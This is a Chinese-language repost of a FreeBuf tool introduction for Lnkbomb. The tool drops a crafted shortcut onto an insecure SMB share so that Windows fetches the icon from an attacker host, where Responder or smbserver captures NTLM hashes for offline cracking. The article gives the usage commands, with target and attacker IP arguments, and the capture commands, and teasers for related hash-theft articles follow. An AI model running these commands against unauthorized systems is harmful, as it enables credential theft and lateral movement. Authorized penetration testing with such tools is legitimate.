Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >如何使用Lnkbomb测试文件共享的安全性

如何使用Lnkbomb测试文件共享的安全性

作者头像
FB客服
发布于 2022-04-11 13:59:38
发布于 2022-04-11 13:59:38
91000
代码可运行
举报
文章被收录于专栏:FreeBufFreeBuf
运行总次数:0
代码可运行

关于Lnkbomb

在很多情况下,内外部网络系统中文件共享的安全问题经常会被管理员所忽略。Lnkbomb作为一款功能强大的安全测试工具,可以帮助广大研究人员通过生成安全测试用的快捷方式,并尝试从目标文件共享中收集NTLM哈希来测试文件共享的安全性能。

工具运行机制

首先,Lnkbomb可以生成一个用于测试的快捷方式文件,并将其上传到目标(不安全)的文件共享。接下来根据Windows操作系统的运行机制,Windows系统将会寻找一个跟该快捷方式文件相关联的图标文件。这个图标文件将能够定向到运行了Responder或smbserver之类工具的安全测试设备上,以实现NTLMv1或NTLMv2哈希的收集操作,具体将取决于目标主机的配置。最后,安全研究人员就可以使用Hashcat之类的工具尝试对其进行离线破解了。

在整个过程中,安全研究人员需要在Payload文件中写入目标设备的IP地址,然后直接将Payload文件通过命令行工具上传到目标文件共享中。

工具安装

该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好Python 3环境。

接下来,广大研究人员就可以使用下列命令将该项目源码克隆至本地:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
git clone https://github.com/dievus/lnkbomb.git

注意:该工具在Windows平台上可以正常运行,在Linux平台上运行可能会遇到一些问题。

工具使用

打开命令行工具,切换到项目根目录后,运行下列命令即可查看工具的帮助信息:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python3 lnkbomb.py -h

上述命令将打开工具的帮助菜单,其中将包含下列参数选项:

-h, --help:查看工具帮助选项 -t, --target:指定目标文件共享位置,例如 -t \\192.168.1.1\Share -a, --attacker:指定测试人员的设备地址,例如 -a 192.168.1.2 -r, --recover:测试完成后,移除Payload文件,例如 -r randomfilegenerated.recover

工具使用样例

样例1

python3 lnkbomb.py -t \\192.168.1.1\Share -a 192.168.1.2

样例2

python3 lnkbomb.py -r randomfilegenerated.recover

样例3

如果你需要使用Responder或smbserver之类的工具来捕捉NTLM哈希的话,可以运行下列命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
responder -I eth0 -dwf -v

或:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
smbserver.py . . -smb2support

使用可执行文件

广大研究人员也可以直接从该项目的【Releases页面】下载Lnkbomb已编译好的可执行文件,所有的运行参数选项和命令行工具的使用是一样的,只不过运行的时候是通过双击lnkbomb.exe实现,而不是运行“python3 lnkbomb.py”命令。

工具运行截图

许可证协议

本项目的开发与发布遵循MIT开源许可证协议。

项目地址

https://github.com/dievus/lnkbomb

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-03-24,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
浅析如何让你的Responder更强大之增强篇
前几天写过一篇关于Responder的文章《浅析如何让你的Responder更强大》。在那篇文章中,我们修复了Responder 实现的SMBv1&SMBv2的问题:使其能够兼容net use客户端的多次Hash捕获,并修复了SMBv2实现存在的bug。
FB客服
2020/02/20
8940
浅析如何让你的Responder更强大之增强篇
如何使用ModuleShifting测试Module Stomping和Module Overloading注入技术
ModuleShifting是一款针对Module Stomping和Module Overloading注入技术的安全测试工具,该工具基于Python ctypes实现其功能,因此可以通过Python解释器或Pyramid在内存中完整执行,这样就可以避免使用编译加载器了。
FB客服
2024/01/04
1480
如何使用ModuleShifting测试Module Stomping和Module Overloading注入技术
SMB共享之SCF文件攻击解析
SMB是各类组织中广泛使用的一种文件共享协议,而且在很多内部渗透测试过程中,研究人员可以利用这种协议来发现共享文件中包含的敏感信息(例如明文密码和数据库连接信息等等)。但是,即便是一个共享文件中不包含可以用来连接其他系统的凭证数据,只要这个文件给未认证用户提供了写入权限,那么我们就可以用它来获取域用户或Meterpreter Shell的密码哈希。 收集哈希 在此之前,已经有攻击者使用这种SCF(Shell Command File)文件来执行各种操作了,例如显示Windows桌面或打开Windows资
企鹅号小编
2018/01/24
2.3K0
SMB共享之SCF文件攻击解析
内网渗透横向移动之针对Net-NTLM Hash攻击
如果我们获取的Hash为NTLM Hash v1,那么我们可以通过直接跑字典来尝试爆破,但是如今大多都只能拿到Hash v2,除非有强大的字典,否则尝试暴力破解是非常错误的选择,此时,我们可以尝试使用NTLM重放攻击
Gh0st1nTheShel
2021/11/22
1.6K0
tofu:一款功能强大的模块化Windows文件系统安全测试工具
 关于tofu  tofu是一款功能强大的针对Windows文件系统安全的模块化工具,该工具可以使用离线方法对目标Windows文件系统进行渗透测试,并通过绕过Windows系统登录界面来帮助广大研究人员测试Windows主机的安全性。除此之外,该工具还可以执行哈希转储、OSK后门和用户枚举等安全测试任务。  工具运行机制  当Windows计算机关闭时,除非它启用了Bitlocker或其他加密服务,否则它的存储设备中将包含设备上存储的所有内容,就好像它已经被解锁了一样。这也就意味着,我们可以在带有引导功能
FB客服
2023/03/30
5880
tofu:一款功能强大的模块化Windows文件系统安全测试工具
[干货基础]域渗透学习
Kerberos是一种由MIT提出的一种计算机网络授权协议,旨在通过使用加密技术为客户端/服务端应用程序提供强大的认证服务。域内访问其他应用应遵循服务Kerberos协议。完整的域内应用访问流程如图所示,首先由客户端向域控发起认证请求,域控验证用户是否属于合法域用户,若合法则由域控响应主机请求分发TGT认证票据(黄金票据可伪造TGT),拿到证书后主机可以继续请求访问域内的应用服务,若权限符合域控会返回允许主机访问域内某应用服务的TGS票据,主机拿着TGS票据访问对应的应用服务,该应用服务器验证TGS通过后主机即可顺利访问应用服务
天钧
2020/11/03
1.7K0
[干货基础]域渗透学习
如何使用espoofer测试邮件系统与邮件协议的安全性
 关于espoofer  espoofer是一款功能强大的电子邮件系统安全检测工具,同时它也是一款电子邮件欺骗攻击测试工具。在该工具的帮助下,广大研究人员不仅可以轻松绕过SPF、DKIM和DMARC等与电子邮件安全相关的协议,而且还可以伪造DKIM签名。 除此之外,espoofer也是一个开源的安全测试工具,该工具支持绕过电子邮件系统中的SPF、DKIM和DMARC身份验证机制。值得一提的是,该工具能够帮助邮件服务器管理员和渗透测试人员检查目标电子邮件服务器和客户端是否容易受到电子邮件欺骗攻击,或者是否可能
FB客服
2023/03/30
2.2K0
如何使用espoofer测试邮件系统与邮件协议的安全性
ADCSsync:基于ESC1执行DCSync技术和哈希转储的强大工具
ADCSsync是一款功能强大的临时性DCSync技术测试工具,该工具基于ESC1实现其功能,虽然该工具在运行速度方面没有优势,但ADCSsync能够在不使用DRSUAPI或卷影副本的情况下有效地执行临时DCSync攻击技术测试。
FB客服
2024/03/18
1780
ADCSsync:基于ESC1执行DCSync技术和哈希转储的强大工具
2023第一个重大漏洞,几乎影响所有组织
Dark Reading 网站披露,微软修复了 Outlook 中存在的零日漏洞,漏洞被追踪为 CVE-2023-23397,是一个权限提升漏洞,攻击者可以利用该漏洞访问受害者的 Net-NTLMv2 响应身份验证哈希并冒充用户。安全研究人员警告称 CVE-2023-23397 非常危险,有望成为近期影响最深远的漏洞。 CVE-2023-23397 漏洞由乌克兰计算机应急响应小组(CERT)的研究人员和微软一名研究人员发现,本周早些时候微软已经进行了补丁更新。 攻击者能够轻松利用漏洞 一旦攻击者成
FB客服
2023/03/29
6240
2023第一个重大漏洞,几乎影响所有组织
如何使用ntlm_theft生成各种类型的NTLMv2哈希窃取文件
ntlm_theft是一款基于Python 3开发的开源工具,可以生成21种不同类型的哈希窃取文档。该工具适用于网络钓鱼攻击,可以用于支持外网SMB流量和内部网络环境之中。与基于宏的文档或利用漏洞的文档相比,这些文件类型的好处在于,所有的这些文件都是使用“预期功能”构建的。
FB客服
2021/10/21
7390
域内窃取哈希一些技术
在拿下一台机器后一般都是直接抓取密码,其实我们可以通过一些域内水坑攻击了获取更多的哈希值。
黑白天安全
2021/02/26
1.1K0
域内窃取哈希一些技术
Active Directory渗透测试典型案例(1)
我有几个客户在渗透测试之前来找我,说他们的系统安全做得非常好,因为他们的漏洞扫描显示没有严重的漏洞并且已准备好进行安全测试,这使我在15分钟内利用AD中的错误配置获得了域管理员权限。
用户1631416
2019/05/28
1.2K0
如何使用HBSQLI自动测试基于Header的SQL盲注
HBSQLI是一款功能强大的自动化SQL注入漏洞测试工具,该工具可以帮助广大研究人员以自动化的形式测试基于Header的SQL盲注漏洞。
FB客服
2023/12/19
2040
如何使用HBSQLI自动测试基于Header的SQL盲注
NTLM协议详解
NTLM(New Technology LAN Manager)身份验证协议是微软用于Windows身份验证的主要协议之一。早期SMB协议以明文口令的形式在网络上传输,因此产生了安全性问题。后来出现了LM(LAN Manager)身份验证协议,它是如此的简单以至于很容易被破解。后来微软提出了NTLM身份验证协议,以及更新的NTLM V2版本。NTLM协议既可以为工作组中的机器提供身份验证,也可以用于域环境身份验证。NTLM协议可以为SMB、HTTP、LDAP、SMTP等上层微软应用提供身份认证。
谢公子
2023/02/27
6.2K0
NTLM协议详解
使用keimpx检测网络环境中的有效凭证
keimpx是一款功能强大的开源工具,该工具可以帮助广大研究人员快速检测网络环境中跟SMB相关的有效凭证。这些凭证可以是下列内容之一:
FB客服
2021/10/11
4870
内网渗透基石篇--域内横向移动分析及防御
域内横向移动技术就是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中。攻击者会利用该技术,以被攻陷的系统为跳板,访问其他 域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。
FB客服
2021/07/27
3K0
内网渗透基石篇--域内横向移动分析及防御
内网渗透|HASH与横向移动
在内网渗透的过程中,最重要的就是信息搜集,但是在极端情况下我们找不到能够横或者跨域的机器,那么这时候我们就可以尝试做一个水坑,来尝试获取hash。当然这只是理想情况,在愈发强调对抗的当下,利用水坑钓鱼也变得不是那么简单。
HACK学习
2021/08/13
1.2K0
go-secdump:一款Windows注册表安全测试工具
该工具基于go-smb实现其功能,支持通过远程转储的形式从目标设备SAM注册表配置单元提取哈希值以及从SECURITY配置单元提取LSA敏感数据和缓存哈希值,整个过程无需任何远程代理,也无需接触磁盘。
FB客服
2024/07/22
1850
go-secdump:一款Windows注册表安全测试工具
域渗透之NTML-Hash
早期SMB协议在网络上传输明文口令。后来出现"LAN Manager Challenge/Response"验证机制,简称LM,它是如此简单以至很容易被破解。微软提出了WindowsNT挑战/响应验证机制,称之为NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。Windows加密过的密码口令,我们称之为hash(中文:哈希),Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。
陈殷
2020/03/06
4.7K0
如何使用KnowsMore对Microsoft活动目录执行安全渗透测试
KnowsMore是一款针对Microsoft活动目录安全的多功能工具,该工具使用纯Python开发,旨在帮助广大研究人员轻松执行针对Microsoft活动目录的渗透测试任务。
FB客服
2024/02/26
3120
如何使用KnowsMore对Microsoft活动目录执行安全渗透测试
推荐阅读
相关推荐
浅析如何让你的Responder更强大之增强篇
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验